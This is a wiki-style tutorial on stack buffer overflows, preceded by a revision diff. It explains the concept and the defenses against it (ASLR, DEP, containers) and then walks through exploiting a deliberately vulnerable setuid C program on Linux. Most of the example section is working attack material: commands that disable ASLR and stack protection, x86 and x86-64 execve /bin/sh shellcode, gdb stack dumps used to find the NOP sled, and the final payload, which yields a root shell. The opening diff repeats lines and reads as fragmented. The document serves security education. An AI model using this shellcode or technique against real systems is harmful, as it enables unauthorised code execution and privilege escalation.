Now that we are in our main function, lets examine the stack.  We know that we have at least 116 bytes on the stack, so lets examine 200 bytes to make sure we have all we need.  We are looking for the address of our shell code on the stack.
+
 
+
 
   (gdb) x/200x $esp
 
   (gdb) x/200x $esp
 
   0xbffff340: 0x00119222 0xbffff3e4 0x080481f4 0xbffff3d8
 
   0xbffff340: 0x00119222 0xbffff3e4 0x080481f4 0xbffff3d8
Line 165: Line 235:
 
   0xbffff490: 0xbffff6be 0xbffff70f 0xbffff721 0xbffff74b
 
   0xbffff490: 0xbffff6be 0xbffff70f 0xbffff721 0xbffff74b
 
   0xbffff4a0: 0xbffff76b 0xbffff779 0xbffffc1a 0xbffffc40
 
   0xbffff4a0: 0xbffff76b 0xbffff779 0xbffffc1a 0xbffffc40
  ---Type <return> to continue, or q <return> to quit---
 
 
   0xbffff4b0: 0xbffffc52 0xbffffcae 0xbffffce0 0xbffffceb
 
   0xbffff4b0: 0xbffffc52 0xbffffcae 0xbffffce0 0xbffffceb
 
   0xbffff4c0: 0xbffffd17 0xbffffd64 0xbffffd7a 0xbffffd89
 
   0xbffff4c0: 0xbffffd17 0xbffffd64 0xbffffd7a 0xbffffd89
Line 186: Line 255:
 
   0xbffff5d0: 0xb8fc08c0 0xd3d76e6a 0x693bf638 0x00363836
 
   0xbffff5d0: 0xb8fc08c0 0xd3d76e6a 0x693bf638 0x00363836
 
   0xbffff5e0: 0x00000000 0x6d6f682f 0x65742f65 0x63696e6b
 
   0xbffff5e0: 0x00000000 0x6d6f682f 0x65742f65 0x63696e6b
   0xbffff5f0: 0x622f6c61 0x9000666f '''0x90909090 0x90909090'''
+
   0xbffff5f0: 0x622f6c61 0x9000666f '''0x90909090 0x90909090'''
 
   '''0xbffff600: 0x90909090 0x90909090 0x90909090 0x90909090'''
 
   '''0xbffff600: 0x90909090 0x90909090 0x90909090 0x90909090'''
 
   '''0xbffff610: 0x90909090 0x90909090 0x90909090 0x90909090'''
 
   '''0xbffff610: 0x90909090 0x90909090 0x90909090 0x90909090'''
  ---Type <return> to continue, or q <return> to quit---
 
 
   '''0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090'''
 
   '''0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090'''
 
   '''0xbffff630: 0xeb909090 0x76895e1f 0x88c03108 0x46890746'''
 
   '''0xbffff630: 0xeb909090 0x76895e1f 0x88c03108 0x46890746'''
Line 195: Line 263:
 
   '''0xbffff650: 0x80cd40d8 0xffffdce8 0x69622fff 0x68732f6e'''
 
   '''0xbffff650: 0x80cd40d8 0xffffdce8 0x69622fff 0x68732f6e'''
  
We are looking for our shellcode on the stack.  The easiest thing to do here, is look for our NOPs. We need to find the address of our NOPs so that we can use this as the return address on the stack.  This will cause execution to resume with our shell code once the function returns.
+
The next step is to find the shellcode on the stack.  The easiest thing to do here is to look for the NOPs. The address of the NOPs is required so this can be used as the return address on the stack.  This will cause execution to resume with the shell code once the function returns.
 +
{{protip|Advanced attacks include [[ascii shellcode]] for maximum evasion.}}
  
Above we can see our NOPS starting at 0xbffff5f8. We will actually be using 0xbffff610 since its a clean address. We need to arrange this in little endian format. "\x10\xf6\xff\xbf"
+
Note the NOPs above: the sled starts at 0xbffff5f7, and the first full word of NOPs is at 0xbffff5f8. 0xbffff610 will be used since it is a cleaner address that still lies inside the sled. Arranged in little endian format, this is "\x10\xf6\xff\xbf".
  
Lets clear our breakpoint and restart our application with the same command line argument, but replace the "\x41\x41\x41x\x41" at the end of our argument with our return address of "\x10\xf6\xff\xbf"
+
=====On x86-64=====
 +
 
 +
  (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68
 +
  \x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x41\x41
 +
  \x41\x41\x41\x41\x41\x41"'`
 +
  Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb
 +
  \x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b
 +
  \x0f\x05", "A" x 30, "\x41\x41\x41\x41\x41\x41\x41\x41"'`
 +
  (gdb) x/400x $rsp
 +
{{Quote|I truncated this cause it was huge|Xochipilli}}
 +
  ...
 +
  0x7fffffffe510: 0x00000064 0x00000000 0x00000003 0x00000000
 +
  0x7fffffffe520: 0x00400040 0x00000000 0x00000004 0x00000000
 +
  0x7fffffffe530: 0x00000038 0x00000000 0x00000005 0x00000000
 +
  0x7fffffffe540: 0x00000008 0x00000000 0x00000007 0x00000000
 +
  0x7fffffffe550: 0xf7ddd000 0x00007fff 0x00000008 0x00000000
 +
  0x7fffffffe560: 0x00000000 0x00000000 0x00000009 0x00000000
 +
  0x7fffffffe570: 0x00400400 0x00000000 0x0000000b 0x00000000
 +
  0x7fffffffe580: 0x000003e8 0x00000000 0x0000000c 0x00000000
 +
  0x7fffffffe590: 0x000003e8 0x00000000 0x0000000d 0x00000000
 +
  0x7fffffffe5a0: 0x000003e8 0x00000000 0x0000000e 0x00000000
 +
  0x7fffffffe5b0: 0x000003e8 0x00000000 0x00000017 0x00000000
 +
  0x7fffffffe5c0: 0x00000000 0x00000000 0x00000019 0x00000000
 +
  0x7fffffffe5d0: 0xffffe609 0x00007fff 0x0000001f 0x00000000
 +
  0x7fffffffe5e0: 0xffffefe1 0x00007fff 0x0000000f 0x00000000
 +
  0x7fffffffe5f0: 0xffffe619 0x00007fff 0x00000000 0x00000000
 +
  0x7fffffffe600: 0x00000000 0x00000000 0xcc45c200 0xf80e704b
 +
  0x7fffffffe610: 0xd5660936 0xff5959b5 0x36387878 0x0034365f
 +
  0x7fffffffe620: 0x00000000 0x00000000 0x6d6f682f 0x6f782f65
 +
  0x7fffffffe630: 0x6c69662f 0x622f7a65 0x622f666f 0x9000666f
 +
  '''0x7fffffffe640: 0x90909090 0x90909090 0x90909090 0x90909090'''
 +
  '''0x7fffffffe650: 0x90909090 0x90909090 0x90909090 0x90909090'''
 +
  '''0x7fffffffe660: 0x90909090 0x90909090 0x90909090 0x90909090'''
 +
  '''0x7fffffffe670: 0x90909090 0x90909090 0x48909090 0xbb48d231'''
 +
  ...
 +
 
 +
Note that the nopsled begins just before 0x7fffffffe640, so this address is used as the return address (the value loaded into rip when main returns). Converted to little endian and formatted appropriately, this is \x40\xe6\xff\xff\xff\x7f\x00\x00.
 +
 
 +
===Exploitation===
 +
After clearing the breakpoint, restart the application with the same command line argument, but replace the placeholder "\x41\x41\x41\x41" at the end of the argument with the return address found above ("\x10\xf6\xff\xbf" on x86).
  
 
   (gdb) clear main
 
   (gdb) clear main
 
   Deleted breakpoint 1  
 
   Deleted breakpoint 1  
  
   (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
+
=====On x86=====
 +
 
 +
   (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46
 +
  \x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89
 +
  \xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
 
   The program being debugged has been started already.
 
   The program being debugged has been started already.
 
   Start it from the beginning? (y or n) y
 
   Start it from the beginning? (y or n) y
  
   Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
+
   Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60,"\xeb\x1f\x5e
   process 2262 is executing new program: /bin/dash
+
  \x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d
 +
  \x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh",  
 +
  "A"*7, "\x10\xf6\xff\xbf"'`
 +
   process 2262 is executing new program: /bin/sh
 
   # whoami
 
   # whoami
 
   root
 
   root
   #  
+
   #
  
 +
=====On x86-64=====
  
YAY!.  We have successful exploitation.  If for some reason your exploitation was not successful, you could attempt a different return address.  Later we will move into more advanced topics.  I hope this was helpful.
+
  (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e
 +
  \x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f
 +
  \x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 +
  Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31
 +
  \xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50
 +
  \x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 +
  process 27319 is executing new program: /bin/dash
 +
  $ whoami
 +
  xo
 +
  $
  
 +
{{Quote|The x86-64 shellcode used in this example does not call setuid() so it will execute at the privileges of the exploited application|Xochipilli}}
  
 +
YAY! Successful exploitation has occurred. 
 +
{{protip|If for some reason the exploitation was not successful, you could attempt a different [[return address]].}}
  
[[Category:Attacks]]
+
{{exploitation}}

Latest revision as of 08:37, 20 June 2016

Buffer overflow, or buffer overrun, is a software error triggered when a program does not adequately control the amount of data that is copied into a buffer. If this amount exceeds the preassigned capacity, the remaining bytes are stored in adjacent memory areas, overwriting their original content. This can be exploited by overwriting a function's return address to cause arbitrary code execution and allow access to a vulnerable system.

This is an introductory article to buffer overflows. Bleeding Life is an example of a project containing buffer overflows that bypass ASLR and DEP for Windows 7.
Buffer overflow requires a basic understanding of assembly and machine code.


Special thanks to Teknical for his contributions to this article.

Description

A computer receives input, recalls what to do with the input, and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and execute it because it doesn't know any better. This is what happens during a buffer overflow attack.

The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. If a user sends in 300 pieces of data or mail, there are two scenarios: 1. A secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail". 2. An insecure program would simply take all the data into boxes 1-300.

In the insecure scenario, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous vulnerability.
Notice: Though it is a dying attack vector, the buffer overflow is still very prominent today.

In all actuality, there is a return address that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.
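The analogy above can be sketched as a toy model. This is only an illustration of the idea, not of real memory: the names `new_memory`, `insecure_store`, and `secure_store` are made up for this sketch, and the box numbers follow the text.

```ruby
# Toy model of the P.O. box analogy; box numbers follow the text above.
DATA_BOXES = 200 # boxes 1-200 hold user data
RETURN_BOX = 201 # box 201 holds the return address

# Builds a fresh "post office" of 500 boxes (index 0 is box 1).
def new_memory
  memory = Array.new(500)
  memory[RETURN_BOX - 1] = :legit_return_address
  memory
end

# Insecure: stores every piece of mail, even past box 200.
def insecure_store(memory, mail)
  mail.each_with_index { |item, i| memory[i] = item }
  memory
end

# Secure: refuses input that does not fit in the data boxes.
def secure_store(memory, mail)
  raise ArgumentError, "only #{DATA_BOXES} pieces fit" if mail.size > DATA_BOXES
  insecure_store(memory, mail)
end

# 201 pieces of mail: 200 fillers plus a new "return address" pointing at box 1.
mail = Array.new(DATA_BOXES, :filler) + [:box_1]

overflowed = insecure_store(new_memory, mail)
puts "insecure: box 201 now holds #{overflowed[RETURN_BOX - 1].inspect}"

begin
  secure_store(new_memory, mail)
rescue ArgumentError => e
  puts "secure: rejected (#{e.message})"
end
```

In the insecure case the 201st piece of mail lands in the box that held the return address, which is exactly the aim the attacker needs.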

Protip: Debuggers such as IDA Pro, kgdb, gdb, and ollydbg are very helpful for finding the correct return pointer for the shellcode.


Defenses

ASLR

There are multiple defenses that have been incorporated into runtime in an attempt to fight buffer overflows and prevent them from taking place. One of the most recent defense mechanisms is called ASLR, which stands for Address Space Layout Randomization. It makes it so every time the computer reboots and every time a program runs, the address space that it lives in changes. In other words, following the mailbox analogy, the return address will never be in the same mailbox. The point of this is to try to prevent an attacker from performing a buffer overflow exploit because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which tricks the error handler for programs and allows an attacker to aim his attack correctly without having to know a return address. Some key failures of ASLR include that certain Operating Systems (such as Windows 7) dynamically disable it for non-compatible libraries.

DEP

Another defense mechanism that has been implemented is called DEP, which stands for Data Execution Prevention. DEP marks data regions such as the stack and heap as non-executable, so machine code (the code that buffer overflows are crafted in) placed into data segments cannot be run even if the return address is redirected to it. Return-oriented programming (ROP) is used when defeating modern DEP.

To combat additional filters, attackers have developed polymorphic and multi-architecture alphanumeric shellcode and polymorphic ASCII machine code and shellcodes. ASCII and Polymorphic ASCII code looks to many filters like normal user input instead of malicious binary or machine code.

Containers

An even further defense mechanism is called a container, which is another layer of Data Execution Prevention. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the application from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or CSA. Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.
Notice: As attacks become more and more sophisticated, so do hardware and software prevention mechanisms. Notice something outdated? Visit our IRC and tell us about it!

Bypassing protections

So with CSA, ASLR, and Operating-System supplied DEP, successfully performing a buffer overflow exploit against a system can be extremely difficult. Any attacker who makes it to the point where CSA catches it is already very advanced. To successfully subvert ASLR, DEP and containers one must use polymorphic ASCII shellcode and return-oriented programming. Return-oriented programming is used to evade the NX bit and XD bits, a type of hardware DEP implemented directly into processors. Machine code that self-modifies as well as looks like standard user input and has all of its own functions built into its own code, in a return-oriented fashion, is required to bypass modern-day host level buffer overflow defense standards. The return address must always be specified in normal hexadecimal format, so it will usually look like some really funny characters, like squares or like strange symbols. The IDS or HIDS Context Buffer will show four squares or symbols on the end in a real buffer overflow exploit attempt on 32-bit systems, and eight squares or symbols on the end on a 64-bit system.

Learning to count in hex and bitwise math will tell you more about the sizes.

Maximum effectiveness

Many times firewall rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called Second Stage Shellcode to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent firewalls and prevent a firewall from blocking a connection.

Buffer overflows can be used remotely to gain partial or total systems access, or they can be used locally to escalate privileges and permissions segments inside of the operating system in order to gain system or root level access. The real threat that a buffer overflow causes is what is called the "Zero-Day attack", also known as a buffer overflow that the security world has never seen before. Zero-Day or 0day attacks are the most devastating to the security industry, causing worms, viruses, and sometimes even hundreds of thousands of systems to be compromised in a single day.

Causes

Buffer overflows exist because of a combination of insecure language compilers, insecure programming practices, and CPU architectures that keep the return address of a function call on the stack. A programmer should be able to check input to the data segment with relative ease; however, coders are often either ignorant of the problem or overlook the flaw, and occasionally a disgruntled employee might code the vulnerability into an application for personal gain after the application goes to production.

Protip: Bench-marking and pen-testing software in an as-you-develop fashion for proper quality assurance and control can help prevent attacks from a malicious insider.


Example

Notice: This example is for a 32 bit Linux operating system and the steps below may vary per your distribution and installation.

Disabling ASLR

The first step is to disable ASLR. This allows the featured proof of concept to be successful. There are other methods of bypassing ASLR, but they will not be covered here.

 teknical@teknical-vm:~$ sudo -s
 [sudo] password for teknical: 
 root@teknical-vm:~# echo 0 > /proc/sys/kernel/randomize_va_space
 root@teknical-vm:~# exit
 exit
 teknical@teknical-vm:~$ 
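To confirm the setting took effect, the same file can be read back. The sketch below is a hedged helper, not part of the original walkthrough: `describe_aslr` and `ASLR_MODES` are names invented here, and the meaning of each value follows the Linux kernel sysctl documentation.

```ruby
# Meaning of each randomize_va_space value, per the kernel sysctl documentation.
ASLR_MODES = {
  0 => "disabled",
  1 => "stack, mmap base, and VDSO page randomized",
  2 => "as 1, plus heap (brk) randomization"
}.freeze

# Turns the raw file contents (for example "0\n") into a description.
def describe_aslr(raw)
  ASLR_MODES.fetch(Integer(raw.strip), "unknown value")
end

path = "/proc/sys/kernel/randomize_va_space"
if File.readable?(path)
  puts "ASLR: #{describe_aslr(File.read(path))}"
else
  puts "#{path} is not available on this system"
end
```

For the example in this article the expected result is "disabled".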

Test application

The test application is below. Note that there is a statically allocated buffer of 100 bytes. This is what will be overflowed. Calling strcpy on unchecked input is a common mistake. A length-checked copy (for example strncpy with an explicit bound) is recommended instead to prevent applications from being exploited.

bof.c

 
  #include <stdlib.h>
  #include <stdio.h>
  #include <string.h>
 
  int main(int argc, char *argv[]){
  	char buffer[100];
  	strcpy(buffer,  argv[1]);
  	return 0;
  }

Compiling

For compilation, use the -g option of gcc to include debugging symbols in the binary, which makes debugging easier.

 teknical@teknical-vm:~$ gcc -g bof.c -o bof

Following compilation, the vulnerability can be triggered. This example has a buffer of 100 bytes, so a good first test is 104 bytes, which should result in an overflow. Ruby is used to build the 104-byte string dynamically; Perl is another option.

Potential compile-time protections
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 *** stack smashing detected ***: ./bof terminated
Teknical says
By default on newer versions of gcc and other modern compilers, code is sanitized and protected at compile time.
Solution for test application

The test application must be compiled without this protection. The stack protector is disabled by passing the -fno-stack-protector option to gcc.

 teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof

Testing

A setuid binary is used for this example so that a root shell is obtained. Set up the bof binary as setuid root as follows:

 teknical@teknical-vm:~$ sudo chown root:root ./bof
 teknical@teknical-vm:~$ sudo chmod 4755 ./bof

On x86

Following the compilation of the application, the vulnerability can be triggered once again. As stated earlier, 104 bytes are used and this is increased until the vulnerability is triggered.

 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*108'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*112'`
 Segmentation fault

Note that it took 112 bytes to successfully overwrite the saved ebp of the running application. The system is now prepared for exploitation attempts. Note that 116 bytes are required to overwrite the return address on the stack.

Notice: The extra bytes between the end of the 100-byte buffer and the return address hold alignment padding and saved registers such as ebp. These are also overwritten.

On x86-64

This number will vary on x86-64...

 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 100'`
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 110'`
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 120'`
 Segmentation fault
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 119'`

On x86-64 it takes 120 bytes to trigger a segfault. Another important difference is that the return address will be placed in the 8 byte rip register, not the 4 byte eip register.

Disabling DEP

DEP is another protection scheme which prevents code in the stack from being executed. 'execstack' is used to check the status of and set the binary to have an executable stack.

Xochipilli says
Gcc's `-z execstack' parameter can be used to set the stack as executable at compile time

The -q option will query the current status.

 teknical@teknical-vm:~$ sudo execstack -q bof
 - bof

Notice the -, which means that the application will NOT have an executable stack. This will prevent successful exploitation.

The -s option is used to set the binary to allow execution on the stack.

 teknical@teknical-vm:~$ sudo execstack -s bof

If queried again, an X will appear in its place, which means that the stack is now executable.

 teknical@teknical-vm:~$ sudo execstack -q bof
 X bof
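The query output shown above is easy to check from a script. The sketch below assumes the marks described in the execstack manual page (X, - and ?); `parse_execstack` is a hypothetical helper name.

```ruby
# Marks printed by `execstack -q`, per the execstack manual page.
MARKS = {
  "X" => :executable,
  "-" => :not_executable,
  "?" => :unknown
}.freeze

# Splits a line such as "X bof" into [file name, stack status].
def parse_execstack(line)
  mark, file = line.strip.split(" ", 2)
  [file, MARKS.fetch(mark)]
end

["- bof", "X bof"].each do |line|
  file, status = parse_execstack(line)
  puts "#{file}: #{status}"
end
```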

Debugging

Notice: gdb is required for the following sections, installed using the package manager

The next step is to start up gdb and begin debugging.

Shellcode analysis

Shellcode is machine code, assembled as a flat binary, that is executed during exploitation of a buffer overflow.
On x86

The following will be used as the argument to the test application:

 `ruby -e 'print "\x90"*60,
 "\xeb\x1f\x5e\x89\x76\x08
 \x31\xc0\x88\x46\x07\x89
 \x46\x0c\xb0\x0b\x89\xf3
 \x8d\x4e\x08\x8d\x56\x0c
 \xcd\x80\x31\xdb\x89\xd8
 \x40\xcd\x80\xe8\xdc\xff
 \xff\xff/bin/sh", "A"*7,
 "\x41\x41\x41\x41"'` 
There are a few things to be noted examining the shellcode above.
Notice: The backticks are bash command substitution as described in the bash book.
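The shellcode used is 45 bytes long. It is an execve("/bin/sh") shellcode followed by an exit call; it relies on the setuid bit set on the binary earlier rather than calling setuid() itself: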
 \xeb\x1f\x5e\x89\x76\x08
 \x31\xc0\x88\x46\x07\x89
 \x46\x0c\xb0\x0b\x89\xf3
 \x8d\x4e\x08\x8d\x56\x0c
 \xcd\x80\x31\xdb\x89\xd8
 \x40\xcd\x80\xe8\xdc\xff
 \xff\xff/bin/sh

From the earlier tests, 112 bytes are needed to reach the return address (overwriting the saved ebp along the way), and another 4 bytes overwrite the return address itself. The shellcode is preceded by 60 NOPs: 60 + 45 = 105. A further 7 bytes of padding bring the total to 112; 0x41 ('A') is recommended for this padding because it is easy to spot in a debugger. The final 4 bytes are the return address. 60 + 45 + 7 + 4 = 116, which is the number of bytes needed to overwrite the return address and successfully exploit the target.
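The arithmetic can be double-checked by assembling the same pieces and printing where each one starts. This is a minimal sketch using the byte values from the argument above; the constant names are chosen here for illustration, and the return address is still the "AAAA" placeholder.

```ruby
# Pieces of the argument, with sizes taken from the text.
NOP_SLED  = "\x90".b * 60
SHELLCODE = ["eb1f5e897608" "31c088460789" "460cb00b89f3" "8d4e088d560c" \
             "cd8031db89d8" "40cd80e8dcff" "ffff"].pack("H*") + "/bin/sh".b
PADDING     = "A".b * 7
RETURN_ADDR = "AAAA".b # placeholder, replaced once the real address is known

parts = [
  ["NOP sled",       NOP_SLED],
  ["shellcode",      SHELLCODE],
  ["padding",        PADDING],
  ["return address", RETURN_ADDR]
]

# Print the offset and size of each piece.
offset = 0
parts.each do |name, bytes|
  puts format("%-15s offset %3d, %3d bytes", name, offset, bytes.bytesize)
  offset += bytes.bytesize
end

payload = parts.map(&:last).join
puts "total: #{payload.bytesize} bytes"
```

The return address placeholder should start at offset 112, matching the 112 bytes observed in the earlier test.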

On x86-64

The following shellcode is used to spawn a shell:

 "\x48\x31\xd2"                                  // xor    %rdx, %rdx
 "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov    $0x68732f6e69622f2f, %rbx
 "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
 "\x53"                                          // push   %rbx
 "\x48\x89\xe7"                                  // mov    %rsp, %rdi
 "\x50"                                          // push   %rax
 "\x57"                                          // push   %rdi
 "\x48\x89\xe6"                                  // mov    %rsp, %rsi
 "\xb0\x3b"                                      // mov    $0x3b, %al
 "\x0f\x05";                                     // syscall

Or:

 \x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05

This shellcode is 30 bytes long. 120 bytes are required to reach the return address, plus 8 bytes for the return address itself. To start, use a 60 byte nopsled + 30 byte shellcode + 30 bytes of padding + 8 byte return address, totaling 128 bytes.
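The byte counts above can be verified without running anything against the target. The sketch below counts the escapes in the shellcode string and derives the padding; the constant names are illustrative, and the 120-byte offset is the value observed in the earlier x86-64 test.

```ruby
# The shellcode exactly as written above, kept as literal text (single quotes).
ESCAPED = '\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68' \
          '\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05'

# Each \xNN escape stands for exactly one byte.
shellcode_len = ESCAPED.scan(/\\x\h{2}/).size

OFFSET_TO_RETURN = 120 # bytes before the saved return address
SLED_LEN         = 60
RETURN_LEN       = 8

padding_len = OFFSET_TO_RETURN - SLED_LEN - shellcode_len
total_len   = OFFSET_TO_RETURN + RETURN_LEN

puts "shellcode: #{shellcode_len} bytes"
puts "padding:   #{padding_len} bytes"
puts "total:     #{total_len} bytes"
```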

Finding the return address

  • Starting gdb
 teknical@teknical-vm:~$ gdb -q ./bof
 Reading symbols from /home/teknical/bof...done.
  • Setting a breakpoint inside of the "main" function
 (gdb) break main
 Breakpoint 1 at 0x80483ed: file bof.c, line 7.
  • Starting the application with the command line as discussed above.
On x86
 (gdb) r `ruby -e 'print "\x90"*60, "[insert our shellcode here]", "A"*7, "\x41\x41\x41\x41"'`
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, 
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56
 \x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
 Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
 7		strcpy(buffer,  argv[1]);
Teknical says
Viewing the main function, let's examine the stack. It is known that at least 116 bytes on the stack are required, so 200 bytes are examined to make sure all the required space is present. Another thing to look for is the address of the shell code on the stack.
 (gdb) x/200x $esp
 0xbffff340:	0x00119222	0xbffff3e4	0x080481f4	0xbffff3d8
 0xbffff350:	0x0012ca54	0x00000000	0x0012fb48	0x00000001
 0xbffff360:	0x00000000	0x00000001	0x0012c8f8	0x00293ff4
 0xbffff370:	0x00242d19	0x0016d2a5	0xbffff388	0x001549d5
 0xbffff380:	0x00293ff4	0x08049ff4	0xbffff398	0x080482e8
 0xbffff390:	0x0011e030	0x08049ff4	0xbffff3c8	0x08048439
 0xbffff3a0:	0x00294324	0x00293ff4	0x08048420	0xbffff3c8
 0xbffff3b0:	0x0016d4a5	0x0011e030	0x0804842b	0x00293ff4
 0xbffff3c0:	0x08048420	0x00000000	0xbffff448	0x00154bd6
 0xbffff3d0:	0x00000002	0xbffff474	0xbffff480	0x0012f858
 0xbffff3e0:	0xbffff430	0xffffffff	0x0012bff4	0x08048245
 0xbffff3f0:	0x00000001	0xbffff430	0x0011d626	0x0012cab0
 0xbffff400:	0x0012fb48	0x00293ff4	0x00000000	0x00000000
 0xbffff410:	0xbffff448	0xee66f487	0x3b1663f8	0x00000000
 0xbffff420:	0x00000000	0x00000000	0x00000002	0x08048330
 0xbffff430:	0x00000000	0x00123230	0x00154afb	0x0012bff4
 0xbffff440:	0x00000002	0x08048330	0x00000000	0x08048351
 0xbffff450:	0x080483e4	0x00000002	0xbffff474	0x08048420
 0xbffff460:	0x08048410	0x0011e030	0xbffff46c	0x0012c8f8
 0xbffff470:	0x00000002	0xbffff5e4	0xbffff5f7	0x00000000
 0xbffff480:	0xbffff66c	0xbffff690	0xbffff6a3	0xbffff6b3
 0xbffff490:	0xbffff6be	0xbffff70f	0xbffff721	0xbffff74b
 0xbffff4a0:	0xbffff76b	0xbffff779	0xbffffc1a	0xbffffc40
 0xbffff4b0:	0xbffffc52	0xbffffcae	0xbffffce0	0xbffffceb
 0xbffff4c0:	0xbffffd17	0xbffffd64	0xbffffd7a	0xbffffd89
 0xbffff4d0:	0xbffffd9c	0xbffffdb3	0xbffffdca	0xbffffdda
 0xbffff4e0:	0xbffffdee	0xbffffe23	0xbffffe2c	0xbffffe3d
 0xbffff4f0:	0xbffffe4f	0xbffffe63	0xbffffe6b	0xbffffe97
 0xbffff500:	0xbffffea8	0xbfffff0a	0xbfffff47	0xbfffff67
 0xbffff510:	0xbfffff74	0xbfffff96	0xbfffffaf	0x00000000
 0xbffff520:	0x00000020	0x0012d420	0x00000021	0x0012d000
 0xbffff530:	0x00000010	0x078bf3ff	0x00000006	0x00001000
 0xbffff540:	0x00000011	0x00000064	0x00000003	0x08048034
 0xbffff550:	0x00000004	0x00000020	0x00000005	0x00000008
 0xbffff560:	0x00000007	0x00110000	0x00000008	0x00000000
 0xbffff570:	0x00000009	0x08048330	0x0000000b	0x000003e8
 0xbffff580:	0x0000000c	0x000003e8	0x0000000d	0x000003e8
 0xbffff590:	0x0000000e	0x000003e8	0x00000017	0x00000001
 0xbffff5a0:	0x00000019	0xbffff5cb	0x0000001f	0xbfffffe9
 0xbffff5b0:	0x0000000f	0xbffff5db	0x00000000	0x00000000
 0xbffff5c0:	0x00000000	0x00000000	0x85000000	0xaaec0f53
 0xbffff5d0:	0xb8fc08c0	0xd3d76e6a	0x693bf638	0x00363836
 0xbffff5e0:	0x00000000	0x6d6f682f	0x65742f65	0x63696e6b
